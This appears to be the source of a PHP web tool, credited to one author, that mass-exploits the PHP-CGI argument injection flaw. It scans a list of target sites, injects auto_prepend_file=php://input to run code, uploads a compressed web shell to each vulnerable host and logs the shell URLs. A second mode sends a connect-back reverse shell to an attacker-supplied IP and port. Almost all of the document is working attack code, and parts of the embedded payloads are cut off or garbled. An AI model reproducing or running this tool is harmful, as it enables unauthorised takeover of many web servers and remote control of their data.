PHP CGI Argument Injection

Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)

Mass File Uploader

Reverse Shell

Please specify a file to scan:
*

Please specify a file to upload:
*

specify a port (default is 80):

Proxy (ip:port):

* fields are required

hostname (ex: www.sitename.com):

Your IP (ex: 173.194.35.169 ):

Your Port (ex: 80):



All fields are required
'; $host = $_POST['host']; $lip = $_POST['lip']; $lport = $_POST['lport']; $port = $_POST['port']; $proxy = $_POST['proxy']; $list = file($_FILES['listfile']['tmp_name']); $file = base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); $shell = "gzinflate(base64_decode(\"$file\"))"; if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') { /*pentestmonkey's php-reverse-shell. Limitations: proc_open and stream_set_blocking require PHP version 4.3+, or 5+ */ /* Connect Back */ $payload = " array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break;} if (feof(\$pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $packet = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n"; $packet .= $payload."\r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,0); }elseif (isset($_POST['Submit']) && $list != '' && $file != '') { if ($port=='') {$port=80;} for ($n =0; $n < count($list); $n++) { $siteAddbackup = $list[$n]; $siteAdd=str_replace("http://","",$siteAddbackup); preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$siteAddbackup, $match); $path = $match[1]; $pa = strstr(trim($siteAdd),$path); $host=trim(str_replace($pa,"",$siteAdd)); if ($path ==''){$path = "/"; } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;} /* Checking Availability */ $connection = fsockopen($host,$port); if (!$connection) // site is down { echo ' No response from '.htmlentities($host).' ...
'; file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', $siteAddbackup."\r\n", FILE_APPEND); } else // site is up { fclose($connection); Exploitable($host,$path,$p); } } } Function Exploitable($host,$path,$p) { global $html; $i=0; /* Checking Exploitability */ $packet = "GET ".$p."?-s HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n"; sendpacket($packet,1,0,0); $str = array( ' $search){ if(stristr($html, $search) == TRUE) {$i=$i+1;}} switch($i) { case 0: echo ''.$host.' Faild!
'; break; case 2: echo ''.$host.' Exploitable
'; Exploit($host,$path,$p); } } Function Exploit($host,$path,$p) { global $html, $shell; /* Exploiting */ $payload = "
Exploit Faild...
-------------------------------------------------------
'; } else { echo "
Exploit Succeeded...
http://$host$path"."/legalpentest.php
-------------------------------------------------------
"; file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', "http://$host$path"."/legalpentest.php\r\n", FILE_APPEND); } } function sendpacket($packet,$response = 0,$output = 0,$s=0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy == '') { $ock = fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from '.htmlentities($host).' ...
'; stream_set_timeout($ock, 4); } } else { $parts = explode(':',$proxy); // echo 'Connecting to proxy: '.$parts[0].':'.$parts[1].' ...

'; $ock = fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from proxy...
'; fclose($ock); } } if ($ock) { fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); } } ?>